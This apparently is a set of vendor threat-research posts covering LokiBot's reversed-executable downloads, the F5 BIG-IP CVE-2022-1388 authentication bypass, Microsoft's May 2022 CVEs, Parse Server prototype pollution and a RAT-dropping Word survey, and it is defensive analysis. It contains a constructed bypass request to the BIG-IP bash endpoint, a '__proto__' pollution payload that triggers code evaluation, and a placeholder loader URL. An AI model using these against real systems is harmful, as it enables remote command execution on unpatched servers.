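    """Inverse of recover_dll for the sample: swap 'A' for a non-ASCII byte, then reverse."""
    return bytes(0xC3 if b == 0x41 else b for b in data)[::-1]


SAMPLE_URL_REVERSED = reverse_url("http://payload.example.invalid/loader.dat")  # placeholder
SAMPLE_DOWNLOAD = _obfuscate(_build_sample_pe())

if __name__ == "__main__":
    print(reverse_url(SAMPLE_URL_REVERSED))
    print("raw download looks like PE:", looks_like_pe(SAMPLE_DOWNLOAD))
    print("recovered looks like PE:", looks_like_pe(recover_dll(SAMPLE_DOWNLOAD)))
```

The raw download fails the PE check and the recovered bytes pass it, which is the cheap signal a sandbox or proxy rule can use to tell that a "data" download is in fact a reversed executable.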

 

LokiBot is known for stealing credentials from various applications installed on the victim’s machine. It communicates with its Command and Control (C&C) server to perform various tasks on the victim’s machine.

The file is detected by only a few security vendors on the popular threat intelligence sharing portal VirusTotal at the time of writing this blog, which indicates its spreading potential:

 

Evidence of the detection by RTDMI(tm) engine can be seen below in the Capture ATP report for this file:

 

 

 

F5 BIG-IP iControl REST Authentication Bypass

BIG-IP
F5’s BIG-IP is a product family consisting of software, hardware, and virtual appliances designed around application availability, access control, and security solutions. BIG-IP software products run on top of F5’s Traffic Management Operation System® (TMOS), designed specifically to inspect network and application traffic and make real-time decisions based on the configurations given. BIG-IP Configuration Utility is a Web GUI that allows F5 users to set up the BIG-IP product and to make additional changes.

Vulnerability | CVE-2022-1388
BIG-IP iControl is a REST API for BIG-IP, which is accessible over HTTPS on port 443/TCP via the following URL: https://<host>/mgmt/tm/

An authentication bypass vulnerability exists in BIG-IP. The vulnerability is due to insufficient validation of the Connection header field. By including “X-F5-Auth-Token” in the Connection header, the forwarded request omits the authentication token header, leading to authentication bypass. Requests can then be made to the endpoint “/mgmt/tm/util/bash” to execute shell commands.
In the following example, an attacker sends the following unauthenticated POST request

and receives the following response:

As seen in the example, the attacker is able to run the ‘id’ command on the vulnerable machine. A remote attacker can exploit the vulnerability by sending a malicious request to the target server. This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system, through the management port and/or self IP addresses, to execute arbitrary system commands, create or delete files, or disable services. Successful exploitation could result in the execution of arbitrary commands under the security context of root.
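
The mechanism above is standard hop-by-hop header handling: a proxy that follows RFC 7230 section 6.1 removes every header named in the Connection field before forwarding, so naming X-F5-Auth-Token there makes the back end receive a request with no token header at all. The following is an added example, not F5's or SonicWall's code, that shows both halves from the defender's side: a tiny request parser, the header set that survives a compliant forwarding hop (the token disappears while Host and Authorization are kept), and a detection rule that flags iControl REST requests whose Connection header lists the auth-token header, which a legitimate client has no reason to send. The request text is constructed with placeholder credentials and no body.

```python
# Headers RFC 7230 section 6.1 treats as hop-by-hop; a proxy strips these plus any
# header named in the Connection field before forwarding the request.
HOP_BY_HOP = {"connection", "keep-alive", "proxy-authenticate", "proxy-authorization",
              "te", "trailer", "transfer-encoding", "upgrade"}

# Constructed request in the shape described above (no body, placeholder credentials).
SAMPLE_REQUEST = (
    "POST /mgmt/tm/util/bash HTTP/1.1\r\n"
    "Host: bigip.example.invalid\r\n"
    "Authorization: Basic PLACEHOLDER\r\n"
    "X-F5-Auth-Token: placeholder-token\r\n"
    "Connection: keep-alive, X-F5-Auth-Token\r\n"
    "Content-Type: application/json\r\n"
    "\r\n"
)


def parse_request(raw):
    """Split an HTTP/1.1 request into (method, target, [(name, value), ...], body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = []
    for line in header_lines:
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return method, target, headers, body


def connection_tokens(headers):
    """Lower-cased tokens listed in any Connection header."""
    tokens = set()
    for name, value in headers:
        if name.lower() == "connection":
            tokens.update(t.strip().lower() for t in value.split(",") if t.strip())
    return tokens


def forwarded_headers(headers):
    """Headers that survive a standards-compliant proxy hop. Naming the auth-token
    header in Connection is what makes the back end see a request without it."""
    drop = HOP_BY_HOP | connection_tokens(headers)
    return [(n, v) for n, v in headers if n.lower() not in drop]


def is_token_strip_attempt(raw):
    """Detection rule: an iControl REST request whose Connection header lists the
    X-F5-Auth-Token header."""
    _method, target, headers, _body = parse_request(raw)
    return target.startswith("/mgmt/") and "x-f5-auth-token" in connection_tokens(headers)


if __name__ == "__main__":
    _, _, hdrs, _ = parse_request(SAMPLE_REQUEST)
    print("forwarded:", [n for n, _ in forwarded_headers(hdrs)])
    print("suspicious:", is_token_strip_attempt(SAMPLE_REQUEST))
```

The rule is deliberately narrow (path prefix plus the Connection token) so that ordinary keep-alive or close values never match; the same check can sit in a WAF in front of the management interface as a stop-gap until the fixed version is installed.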

Following versions are vulnerable:

  • 16.1.0 – 16.1.2
  • 15.1.0 – 15.1.5
  • 14.1.0 – 14.1.4
  • 13.1.0 – 13.1.4
  • 12.1.0 – 12.1.6
  • 11.6.1 – 11.6.5

This vulnerability has been patched. The vendor advisory is here.

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • IPS 15029:F5 BIG-IP iControl REST Authentication Bypass To RCE

Threat Graph

Microsoft Security Bulletin Coverage for May 2022

SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of May 2022. A list of issues reported, along with SonicWall coverage information, is as follows:

CVE-2022-22017 Remote Desktop Client Remote Code Execution Vulnerability
ASPY 323:Malformed-File exe.MP_253

CVE-2022-23270 Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability
IPS 2715:Malformed PPTP Request 3

CVE-2022-23279 Windows ALPC Elevation of Privilege Vulnerability
ASPY 324:Malformed-File exe.MP_254

CVE-2022-26925 Windows LSA Spoofing Vulnerability
IPS 15756:Windows LSA Spoofing (CVE-2022-26925)

CVE-2022-26937 Windows Network File System Remote Code Execution Vulnerability
IPS 15585:Windows NFS Remote Code Execution (CVE-2022-26937)

CVE-2022-29104 Windows Print Spooler Elevation of Privilege Vulnerability
ASPY 326:Malformed-File exe.MP_256

CVE-2022-29142 Windows Kernel Elevation of Privilege Vulnerability
ASPY 325:Malformed-File exe.MP_255

The following vulnerabilities do not have exploits in the wild:
CVE-2022-21972 Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-21978 Microsoft Exchange Server Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-22011 Windows Graphics Component Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-22012 Windows LDAP Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-22013 Windows LDAP Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-22014 Windows LDAP Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-22015 Windows Remote Desktop Protocol (RDP) Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-22016 Windows PlayToManager Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-22019 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-22713 Windows Hyper-V Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2022-23267 .NET and Visual Studio Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2022-24466 Windows Hyper-V Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2022-26913 Windows Authentication Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2022-26923 Active Directory Domain Services Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-26926 Windows Address Book Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-26927 Windows Graphics Component Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-26930 Windows Remote Access Connection Manager Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-26931 Windows Kerberos Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-26932 Storage Spaces Direct Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-26933 Windows NTFS Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-26934 Windows Graphics Component Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-26935 Windows WLAN AutoConfig Service Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-26936 Windows Server Service Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-26938 Storage Spaces Direct Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-26939 Storage Spaces Direct Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-26940 Remote Desktop Protocol Client Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-29102 Windows Failover Cluster Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-29103 Windows Remote Access Connection Manager Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-29105 Microsoft Windows Media Foundation Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-29106 Windows Hyper-V Shared Virtual Disk Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-29107 Microsoft Office Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2022-29108 Microsoft SharePoint Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-29109 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-29110 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-29112 Windows Graphics Component Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-29113 Windows Digital Media Receiver Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-29114 Windows Print Spooler Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-29115 Windows Fax Service Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-29116 Windows Kernel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-29117 .NET and Visual Studio Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2022-29120 Windows Clustered Shared Volume Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-29121 Windows WLAN AutoConfig Service Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2022-29122 Windows Clustered Shared Volume Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-29123 Windows Clustered Shared Volume Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-29125 Windows Push Notifications Apps Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-29126 Tablet Windows User Interface Application Core Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-29127 BitLocker Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2022-29128 Windows LDAP Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-29129 Windows LDAP Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-29130 Windows LDAP Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-29131 Windows LDAP Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-29132 Windows Print Spooler Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-29133 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-29134 Windows Clustered Shared Volume Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-29135 Windows Cluster Shared Volume (CSV) Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-29137 Windows LDAP Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-29138 Windows Clustered Shared Volume Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-29139 Windows LDAP Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-29140 Windows Print Spooler Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-29141 Windows LDAP Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-29145 .NET and Visual Studio Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2022-29148 Visual Studio Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-29150 Windows Cluster Shared Volume (CSV) Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-29151 Windows Cluster Shared Volume (CSV) Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-29972 Insight Software: CVE-2022-29972 Magnitude Simba Amazon Redshift ODBC Driver
There are no known exploits in the wild.
CVE-2022-30129 Visual Studio Code Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-30130 .NET Framework Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2022-30138 Windows Print Spooler Elevation of Privilege Vulnerability
There are no known exploits in the wild.

Parse Server DatabaseController RCE Vulnerability

Overview:

  The Parse platform provides SDKs for various environments (Android, iOS, PHP, .NET, …) as well as managed cloud data storage. When creating mobile apps, a lot of the development time goes into managing and scaling the data backend and building out user authentication, push notifications and/or social media integration. Parse SDKs and cloud storage allow mobile app developers to quickly build that functionality and focus their efforts on user-facing features.

  Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js:
    • Parse Server uses MongoDB or PostgreSQL as a database.
    • You can deploy and run Parse Server on your own infrastructure.
    • You can develop and test your app locally using Node.

  A prototype pollution vulnerability has been reported in Parse Server. The vulnerability is due to improper validation of user-supplied input in the DatabaseController.

  A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could, in the worst case, result in remote code execution.

  Vendor Homepage

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2022-24760.

  CVE Listing

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 8.7 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O/RC:C).

  Base score is 10.0 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is none.
    • User interaction is none.
    • Scope is changed.
    • Impact of this vulnerability on data confidentiality is high.
    • Impact of this vulnerability on data integrity is high.
    • Impact of this vulnerability on data availability is high.
  Temporal score is 8.7 (E:U/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is unproven.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

  CVSS Calculator Metrics

Technical Overview:

  A remote, unauthenticated attacker uses this exploit to inject properties into Object.prototype or to modify existing ones. Successful exploitation could result in denial of service, as the software encounters objects with unexpected properties or properties with unexpected values. In the worst case it could lead to the execution of arbitrary code on the target server.

  An attacker could, for instance, leverage the prototype pollution vulnerability to unlock a code path in the Node.js BSON module which evaluates arbitrary JavaScript code. MongoDB uses the BSON format for storing data internally and for sending it over the network. The name "BSON" is based on the term JSON and stands for "Binary JSON". It is a binary form for representing simple or complex data structures, including associative arrays (also known as name-value pairs), integer-indexed arrays, and a suite of fundamental scalar types. The BSON format also includes a Code data type for storing JavaScript code. Such an object can be stored in Parse Server by sending the following HTTP request:

  When the object is later retrieved from Parse Server via an HTTP GET request, it is deserialized by the function deserializeObject() in lib/bson/parser/deserializer.js of the Node.js BSON module. When encountering a Code data type the function takes one of two code paths, depending on the value of the boolean options['evalFunctions']. By default this property is undefined and the function returns a string containing the JavaScript code; however, if options['evalFunctions'] is true, the function evaluates the JavaScript code and returns its result. The lookup of options['evalFunctions'] walks the prototype chain, so an options object that does not define the property itself picks up whatever Object.prototype carries. By polluting Parse Server and injecting the property Object.prototype.evalFunctions, an attacker can therefore unlock the second code path without ever touching the options object and gain code execution on the server.

Triggering the Problem:

  • The target system must have the vulnerable product installed and running.
  • The attacker must have network connectivity to the affected ports.

Triggering Conditions:

  The attacker first stores a crafted object on the target server. The attacker then updates that object using an update operator. The vulnerability is triggered when the target server processes the update request.
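  The chain laid out in the Technical Overview and the store-then-update sequence above, as an added example that is not Parse Server's or js-bson's code. The recursive merge routine, the deserializer stand-in, the helper names and the crafted update document are all constructed for illustration; the exact shape of a Parse Server update-operator request is not reproduced. The block pairs each vulnerable routine with a hardened variant and shows that either fix alone breaks the chain.

```javascript
// Added example: a self-contained simulation of the prototype-pollution chain
// described above. None of this is Parse Server or js-bson code; the merge
// routine, the deserializer stand-in and the crafted input are all constructed.

// Keys that must never be walked or written when applying untrusted JSON.
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

// Vulnerable stand-in for an update handler that recursively merges an
// attacker-controlled update document into a stored object. Recursing into a
// key named "__proto__" makes `target[key]` resolve to Object.prototype, so the
// final assignment lands on every object in the process.
function applyUpdateVulnerable(target, update) {
  for (const key of Object.keys(update)) {
    const value = update[key];
    if (value !== null && typeof value === 'object' && !Array.isArray(value)) {
      if (target[key] === null || typeof target[key] !== 'object') target[key] = {};
      applyUpdateVulnerable(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Hardened variant: reject prototype-related keys outright and create nested
// containers without a prototype, so there is no chain left to pollute.
function applyUpdateHardened(target, update) {
  for (const key of Object.keys(update)) {
    if (FORBIDDEN_KEYS.has(key)) throw new Error(`rejected key: ${key}`);
    const value = update[key];
    if (value !== null && typeof value === 'object' && !Array.isArray(value)) {
      const own = Object.prototype.hasOwnProperty.call(target, key);
      if (!own || target[key] === null || typeof target[key] !== 'object') {
        target[key] = Object.create(null);
      }
      applyUpdateHardened(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Stand-in for a BSON deserializer's handling of the Code type, following the
// two branches the text describes: options['evalFunctions'] falsy -> return the
// source as a string; truthy -> evaluate it. The lookup walks the prototype
// chain, so a polluted Object.prototype.evalFunctions flips the branch even
// though the caller never set the option.
function deserializeCodeVulnerable(codeDoc, options = {}) {
  if (options['evalFunctions']) {
    return new Function(`return (${codeDoc.code});`)(); // attacker-supplied code runs here
  }
  return codeDoc.code;
}

// Hardened variant: honour the option only when it is an own property set to
// exactly true, so inherited (polluted) values are ignored.
function deserializeCodeHardened(codeDoc, options = {}) {
  const own = Object.prototype.hasOwnProperty.call(options, 'evalFunctions');
  if (own && options.evalFunctions === true) {
    return new Function(`return (${codeDoc.code});`)();
  }
  return codeDoc.code;
}

// Constructed attacker input. STORED_CODE mimics a stored BSON Code value; the
// update's nested "__proto__" key is the pollution vector. JSON.parse turns
// that key into an ordinary own property, which is why the merge walks it.
const STORED_CODE = { _bsontype: 'Code', code: '6 * 7' };
const CRAFTED_UPDATE = JSON.parse('{"note": {"__proto__": {"evalFunctions": true}}}');

// Store, update, then read back through the deserializer. Reports whether the
// update was rejected, whether Object.prototype got polluted, and what the
// read-back produced. Cleans up the pollution so later code is unaffected.
function runChain(applyUpdate, deserializeCode) {
  const stored = { note: {} };
  let rejected = false;
  try {
    applyUpdate(stored, CRAFTED_UPDATE);
  } catch (e) {
    rejected = true;
  }
  const polluted = ({}).evalFunctions === true;
  const result = deserializeCode(STORED_CODE); // the caller passes no options at all
  delete Object.prototype.evalFunctions;
  return { rejected, polluted, result };
}

console.log('vulnerable merge + vulnerable deserializer:', runChain(applyUpdateVulnerable, deserializeCodeVulnerable));
console.log('hardened merge   + vulnerable deserializer:', runChain(applyUpdateHardened, deserializeCodeVulnerable));
console.log('vulnerable merge + hardened deserializer:  ', runChain(applyUpdateVulnerable, deserializeCodeHardened));
```

  With both vulnerable routines the read-back evaluates the stored code and returns 42 even though the reader passed no options; the hardened merge throws on the `__proto__` key before anything is written, and the hardened deserializer ignores the inherited flag and returns the source as a string. Both defences are worth having: the key filter stops this vector, and the own-property check keeps a sensitive switch from being flipped by any other pollution source.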

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • HTTP
    • HTTPS

SonicWall's Intrusion Prevention System (IPS) provides protection against this threat:

  • IPS: 2653 Parse Server Prototype Pollution RCE

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Blocking the affected ports from external network access if they are not required.
    • Filtering traffic based on the signature above.
    • Upgrading the product to a non-vulnerable version.
  The vendor has released the following advisory regarding this vulnerability:
  Vendor Advisory

Mental health survey drops a Remote Access Trojan

This week the SonicWall Capture Labs Research team came across a malicious document template which delivered a remote access Trojan to unsuspecting victims. It is disguised as a mental health survey and silently drops a RAT in the background.


Infection Cycle:

The file comes as a Microsoft Word template file with a .dotm extension. Once opened in Word, it displays a seemingly benign survey on mental health.

It creates a file in the following directory:

  • /ProgramData/C0E2/RingBell.zip     [Detected as: Crimson.RAT]

It then executes the aforementioned file, which performs the malicious behavior.

It spawns a legitimate application, fondue.exe, to perform system reconnaissance, such as:

  • checking the computer name
  • finding out the system languages
  • checking for numerous security settings, if available on the system

No network activity was observed during the analysis; however, the Trojan has a hardcoded C&C server in its strings.

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Malagent.APT (Trojan)
  • GAV: Crimson.RAT (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.